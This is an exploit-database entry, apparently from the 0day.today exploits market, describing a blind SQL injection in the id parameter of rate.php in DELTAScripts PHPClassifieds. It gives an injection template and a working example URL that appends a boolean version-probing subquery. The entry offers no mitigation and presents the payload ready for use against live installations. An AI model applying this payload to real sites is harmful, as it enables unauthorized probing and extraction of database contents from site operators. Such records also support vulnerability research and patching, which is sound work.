[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DELTAScripts PHPClassifieds (rate.php) Blind SQL Injection

Author
n/a
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10640
Category
web applications
Date add
08-01-2010
Platform
unsorted
==========================================================
DELTAScripts PHPClassifieds (rate.php) Blind SQL Injection
==========================================================


/*
 
Name : DELTAScripts PHPClassifieds
Vuln : Blind SQL Injection

*/
 
Vulnerability is in the rate.php , $_GET['id']
 
[HOST]/[PATH]/rate.php?id=[true value]+[INJECTION]
 
exemples :
http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--



#  0day.today [2024-11-15]  #